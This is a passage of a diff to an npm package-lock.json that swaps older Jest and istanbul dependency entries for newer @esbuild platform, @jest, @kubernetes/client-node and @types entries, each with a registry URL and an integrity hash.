"resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" + "@esbuild/linux-loong64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.6.tgz", + "integrity": "sha512-VgKCsHdXRSQ7E1+QXGdRPlQ/e08bN6WMQb27/TMfV+vPjjTImuT9PmLXupRlC90S1JeNNW5lzkAEO/McKeJ2yg==", + "dev": true, + "optional": true }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", + "@esbuild/linux-mips64el": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.6.tgz", + "integrity": "sha512-WViNlpivRKT9/py3kCmkHnn44GkGXVdXfdc4drNmRl15zVQ2+D2uFwdlGh6IuK5AAnGTo2qPB1Djppj+t78rzw==", "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } + "optional": true }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true + "@esbuild/linux-ppc64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.6.tgz", + "integrity": "sha512-wyYKZ9NTdmAMb5730I38lBqVu6cKl4ZfYXIs31Baf8aoOtB4xSGi3THmDYt4BTFHk7/EcVixkOV2uZfwU3Q2Jw==", + "dev": true, + "optional": true }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "@esbuild/linux-riscv64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.6.tgz", + "integrity": "sha512-KZh7bAGGcrinEj4qzilJ4hqTY3Dg2U82c8bv+e1xqNqZCrCyc+TL9AUEn5WGKDzm3CfC5RODE/qc96OcbIe33w==", "dev": true, - "engines": { - "node": ">=6.9.0" - } + "optional": true }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "@esbuild/linux-s390x": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.6.tgz", + "integrity": "sha512-9N1LsTwAuE9oj6lHMyyAM+ucxGiVnEqUdp4v7IaMmrwb06ZTEVCIs3oPPplVsnjPfyjmxwHxHMF8b6vzUVAUGw==", "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } + "optional": true }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "@esbuild/linux-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.6.tgz", + "integrity": "sha512-A6bJB41b4lKFWRKNrWoP2LHsjVzNiaurf7wyj/XtFNTsnPuxwEBWHLty+ZE0dWBKuSK1fvKgrKaNjBS7qbFKig==", "dev": true, - "engines": { - "node": ">=8.0.0" - } + "optional": true }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", + "@esbuild/netbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.6.tgz", + "integrity": "sha512-IjA+DcwoVpjEvyxZddDqBY+uJ2Snc6duLpjmkXm/v4xuS3H+3FkLZlDm9ZsAbF9rsfP3zeA0/ArNDORZgrxR/Q==", "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } + "optional": true }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dependencies": { - "assert-plus": "^1.0.0" - } + "@esbuild/netbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.6.tgz", + "integrity": "sha512-dUXuZr5WenIDlMHdMkvDc1FAu4xdWixTCRgP7RQLBOkkGgwuuzaGSYcOpW4jFxzpzL1ejb8yF620UxAqnBrR9g==", + "dev": true, + "optional": true }, - "node_modules/glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } + "@esbuild/openbsd-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.6.tgz", + "integrity": "sha512-l8ZCvXP0tbTJ3iaqdNf3pjaOSd5ex/e6/omLIQCVBLmHTlfXW3zAxQ4fnDmPLOB1x9xrcSi/xtCWFwCZRIaEwg==", + "dev": true, + "optional": true }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", + "@esbuild/openbsd-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.6.tgz", + "integrity": "sha512-hKrmDa0aOFOr71KQ/19JC7az1P0GWtCN1t2ahYAf4O007DHZt/dW8ym5+CUdJhQ/qkZmI1HAF8KkJbEFtCL7gw==", "dev": true, - "engines": { - "node": ">=4" - } + "optional": true }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true + "@esbuild/openharmony-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/openharmony-arm64/-/openharmony-arm64-0.25.6.tgz", + "integrity": "sha512-+SqBcAWoB1fYKmpWoQP4pGtx+pUUC//RNYhFdbcSA16617cchuryuhOCRpPsjCblKukAckWsV+aQ3UKT/RMPcA==", + "dev": true, + "optional": true }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "engines": { - "node": ">=4" - } + "@esbuild/sunos-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.6.tgz", + "integrity": "sha512-dyCGxv1/Br7MiSC42qinGL8KkG4kX0pEsdb0+TKhmJZgCUDBGmyo1/ArCjNGiOLiIAgdbWgmWgib4HoCi5t7kA==", + "dev": true, + "optional": true }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } + "@esbuild/win32-arm64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.6.tgz", + "integrity": "sha512-42QOgcZeZOvXfsCBJF5Afw73t4veOId//XD3i+/9gSkhSV6Gk3VPlWncctI+JcOyERv85FUo7RxuxGy+z8A43Q==", + "dev": true, + "optional": true }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", + "@esbuild/win32-ia32": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.6.tgz", + "integrity": "sha512-4AWhgXmDuYN7rJI6ORB+uU9DHLq/erBbuMoAuB4VWJTu5KtCgcKYPynF0YI1VkBNuEfjNlLrFr9KZPJzrtLkrQ==", "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } + "optional": true }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "@esbuild/win32-x64": { + "version": "0.25.6", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.6.tgz", + "integrity": "sha512-NgJPHHbEpLQgDH2MjQu90pzW/5vvXIZ7KOnPyNBm92A6WgZ/7b6fJyUBjoumLqeOQQGqY2QjQxRo97ah4Sj0cA==", "dev": true, - "engines": { - "node": ">=8" - } + "optional": true }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", "dev": true }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } + "@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", + "dev": true }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", + "@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, - "engines": { - "node": ">=10.17.0" + "requires": { + "@types/node": "*", + "jest-regex-util": "30.0.1" } }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", + "@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } + "requires": {} }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", + "@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", "dev": true, - "engines": { - "node": ">=0.8.19" - } + "requires": {} }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" + "@kubernetes/client-node": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", + "dev": true, + "requires": { + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", + "isomorphic-ws": "^5.0.0", + "js-yaml": "^4.1.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", + "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", + "stream-buffers": "^3.0.2", + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", + "@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", "dev": true }, - "node_modules/is-core-module": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.5.0.tgz", - "integrity": "sha512-TXCMSDsEHMEEZ6eCA8rwRDbLu55MRGmrctljsBX/2v1d9/GzqHOxW5c5oPSgrUt2vBFXebu9rGqckXGPWOlYpg==", - "dev": true, - "dependencies": { - "has": "^1.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-fullwidth-code-point": { + "@types/istanbul-lib-report": { "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", + "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", "dev": true, - "engines": { - "node": ">=8" + "requires": { + "@types/istanbul-lib-coverage": "*" } }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", + "@types/istanbul-reports": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", + "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", "dev": true, - "engines": { - "node": ">=6" + "requires": { + "@types/istanbul-lib-report": "*" } }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=", - "dev": true - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, - "dependencies": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-changed-files/node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus/node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "dependencies": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-config/node_modules/@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - 